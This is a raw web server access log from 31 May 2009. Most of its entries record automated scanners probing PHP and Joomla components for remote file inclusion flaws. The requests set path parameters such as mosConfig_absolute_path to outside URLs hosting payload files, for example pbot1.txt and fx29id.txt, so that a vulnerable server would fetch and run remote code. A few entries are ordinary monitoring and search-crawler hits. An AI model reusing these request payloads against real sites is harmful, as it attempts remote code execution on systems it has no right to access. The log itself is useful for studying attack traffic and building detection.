64.6.231.215 - - [31/May/2009:00:46:33 -0400] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:46:53 -0400] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:46:53 -0400] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:46:56 -0400] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
88.191.103.144 - - [31/May/2009:00:47:25 -0400] "GET /logs/error_log.Q109050500/index.php?pag=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.825"
88.191.103.144 - - [31/May/2009:00:47:25 -0400] "GET /index.php?pag=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.825"
88.191.103.144 - - [31/May/2009:00:47:26 -0400] "GET /logs/index.php?pag=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.825"
64.6.231.215 - - [31/May/2009:00:47:31 -0400] "GET /logs/error_log.Q108120400/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 273 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
64.6.231.215 - - [31/May/2009:00:47:31 -0400] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 247 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
64.6.231.215 - - [31/May/2009:00:47:36 -0400] "GET /logs/error_log.Q108120400/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 273 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
64.6.231.215 - - [31/May/2009:00:47:36 -0400] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 247 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
64.6.231.215 - - [31/May/2009:00:47:41 -0400] "GET /logs/error_log.Q108120400/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 273 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
64.6.231.215 - - [31/May/2009:00:47:41 -0400] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 247 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
62.149.0.248 - - [31/May/2009:00:47:48 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
62.149.0.248 - - [31/May/2009:00:47:48 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
62.149.0.248 - - [31/May/2009:00:47:48 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
62.149.0.248 - - [31/May/2009:00:47:54 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
62.149.0.248 - - [31/May/2009:00:47:54 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
219.232.224.65 - - [31/May/2009:00:49:19 -0400] "GET //playing.php?commonpath=http://www.bbenglish.net/zb41/sup?? HTTP/1.1" 404 210 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
219.232.224.65 - - [31/May/2009:00:49:19 -0400] "GET /logs//playing.php?commonpath=http://www.bbenglish.net/zb41/sup?? HTTP/1.1" 404 215 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
64.6.231.215 - - [31/May/2009:00:49:39 -0400] "GET /logs/error_log.Q108112600/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:49:39 -0400] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:49:39 -0400] "GET /logs/error_log.Q108112600/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:49:39 -0400] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:49:39 -0400] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:49:39 -0400] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:49:40 -0400] "GET /logs/error_log.Q108120400/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:49:41 -0400] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:49:41 -0400] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:49:43 -0400] "GET /logs/error_log.Q108122600/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:49:43 -0400] "GET /logs/error_log.Q108122600/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:49:45 -0400] "GET /logs/error_log.Q108120400/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:49:45 -0400] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:49:45 -0400] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:49:45 -0400] "GET /logs/error_log.Q108112600/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:49:45 -0400] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:49:45 -0400] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:49:50 -0400] "GET /logs/error_log.Q108122600/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:49:52 -0400] "GET /logs/error_log.Q108120400/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:49:53 -0400] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:49:53 -0400] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:50:14 -0400] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:50:16 -0400] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:50:17 -0400] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.65"
209.59.12.99 - - [31/May/2009:00:50:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.233.22.209 - - [31/May/2009:00:51:17 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
121.165.73.157 - - [31/May/2009:00:52:03 -0400] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
121.165.73.157 - - [31/May/2009:00:52:03 -0400] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
66.249.67.16 - - [31/May/2009:00:52:22 -0400] "GET /logs/access_log.Q107062100 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.8.108 - - [31/May/2009:00:53:03 -0400] "GET /logs/access_log.Q108032600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
78.31.64.178 - - [31/May/2009:00:53:37 -0400] "GET /logs/access_log.Q109051800//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:00:53:37 -0400] "GET /logs/access_log.Q109051800//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
81.92.97.90 - - [31/May/2009:00:53:39 -0400] "GET //?_zb_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
81.92.97.90 - - [31/May/2009:00:53:39 -0400] "GET /logs//?_zb_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 200 3567 "-" "Mozilla/5.0"
64.6.231.215 - - [31/May/2009:00:54:28 -0400] "GET /logs/error_log.Q108122600/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:54:28 -0400] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:54:28 -0400] "GET /logs/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:55:05 -0400] "GET /logs/error_log.Q108122600/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:55:05 -0400] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:55:06 -0400] "GET /logs/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:55:20 -0400] "GET /logs/error_log.Q108122600/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:55:20 -0400] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:55:20 -0400] "GET /logs/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.65"
62.149.0.248 - - [31/May/2009:00:55:21 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
62.149.0.248 - - [31/May/2009:00:55:24 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
209.59.12.99 - - [31/May/2009:00:55:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.233.22.209 - - [31/May/2009:00:55:59 -0400] "GET /logs/error_log.Q108072100///?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
211.233.22.209 - - [31/May/2009:00:56:00 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 200 3568 "-" "libwww-perl/5.79"
211.233.22.209 - - [31/May/2009:00:56:07 -0400] "GET /logs/error_log.Q108052900///?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
78.31.64.178 - - [31/May/2009:00:59:42 -0400] "GET //joomla/index.php?option=com_restaurante&task=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:00:59:42 -0400] "GET //joomla/index.php?option=com_restaurante&task=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
209.59.12.99 - - [31/May/2009:01:00:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.93.90.41 - - [31/May/2009:01:01:12 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.torgi.kz/help/idxx.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
78.31.64.178 - - [31/May/2009:01:02:05 -0400] "GET /logs/error_log.Q108072100//joomla/index.php?option=com_restaurante&task=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:01:02:05 -0400] "GET /logs/error_log.Q108072100//joomla/index.php?option=com_restaurante&task=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:01:02:05 -0400] "GET //joomla/index.php?option=com_restaurante&task=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:01:02:06 -0400] "GET //joomla/index.php?option=com_restaurante&task=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:01:02:06 -0400] "GET /logs//joomla/index.php?option=com_restaurante&task=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:01:02:06 -0400] "GET /logs//joomla/index.php?option=com_restaurante&task=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:01:02:11 -0400] "GET /logs/error_log.Q108060100//joomla/index.php?option=com_restaurante&task=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:01:02:11 -0400] "GET /logs/error_log.Q108060100//joomla/index.php?option=com_restaurante&task=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
80.93.90.41 - - [31/May/2009:01:02:36 -0400] "GET /logs/access_log.Q109052100/?sourcedir=http://www.torgi.kz/help/idxx.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
62.149.0.248 - - [31/May/2009:01:03:32 -0400] "GET //joomla/index.php?option=com_restaurante&task=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
62.149.0.248 - - [31/May/2009:01:03:33 -0400] "GET //joomla/index.php?option=com_restaurante&task=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
72.18.148.82 - - [31/May/2009:01:04:20 -0400] "GET /index.php?arquivo=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
72.18.148.82 - - [31/May/2009:01:04:20 -0400] "GET /logs/index.php?arquivo=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
72.18.148.82 - - [31/May/2009:01:04:20 -0400] "GET /logs/access_log.Q109052300%20%20/index.php?arquivo=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:01:05:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.237.146.58 - - [31/May/2009:01:05:42 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:01:05:42 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:01:05:42 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
66.249.68.76 - - [31/May/2009:01:05:46 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L200C18446DA14300A0DD058+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
80.237.146.58 - - [31/May/2009:01:05:48 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:01:05:48 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:01:05:48 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
72.18.148.82 - - [31/May/2009:01:06:00 -0400] "GET /logs/access_log.Q109052300/index.php?arquivo=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:01:07:38 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:01:07:38 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:01:07:38 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:01:07:43 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:01:07:44 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:01:07:44 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:01:07:47 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:01:07:47 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:01:07:50 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:01:07:52 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:01:07:53 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:01:07:53 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
62.149.0.248 - - [31/May/2009:01:08:18 -0400] "GET /logs/error_log.Q108072100//joomla/index.php?option=com_restaurante&task=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
62.149.0.248 - - [31/May/2009:01:08:18 -0400] "GET /logs/error_log.Q108072100//joomla/index.php?option=com_restaurante&task=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
62.149.0.248 - - [31/May/2009:01:08:18 -0400] "GET //joomla/index.php?option=com_restaurante&task=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
62.149.0.248 - - [31/May/2009:01:08:19 -0400] "GET //joomla/index.php?option=com_restaurante&task=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
62.149.0.248 - - [31/May/2009:01:08:21 -0400] "GET /logs//joomla/index.php?option=com_restaurante&task=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
62.149.0.248 - - [31/May/2009:01:08:22 -0400] "GET /logs//joomla/index.php?option=com_restaurante&task=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
62.149.0.248 - - [31/May/2009:01:08:44 -0400] "GET /logs/error_log.Q108060100//joomla/index.php?option=com_restaurante&task=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
62.149.0.248 - - [31/May/2009:01:08:44 -0400] "GET /logs/error_log.Q108060100//joomla/index.php?option=com_restaurante&task=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
209.59.12.99 - - [31/May/2009:01:10:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.237.146.58 - - [31/May/2009:01:11:06 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
95.154.202.203 - - [31/May/2009:01:11:47 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/5.0 (compatible; BuiltWith/0.3; +http://builtwith.com/bot.html)"
80.237.146.58 - - [31/May/2009:01:12:31 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:01:12:35 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:01:12:46 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
78.31.64.178 - - [31/May/2009:01:12:47 -0400] "GET //authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:01:12:47 -0400] "GET //authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
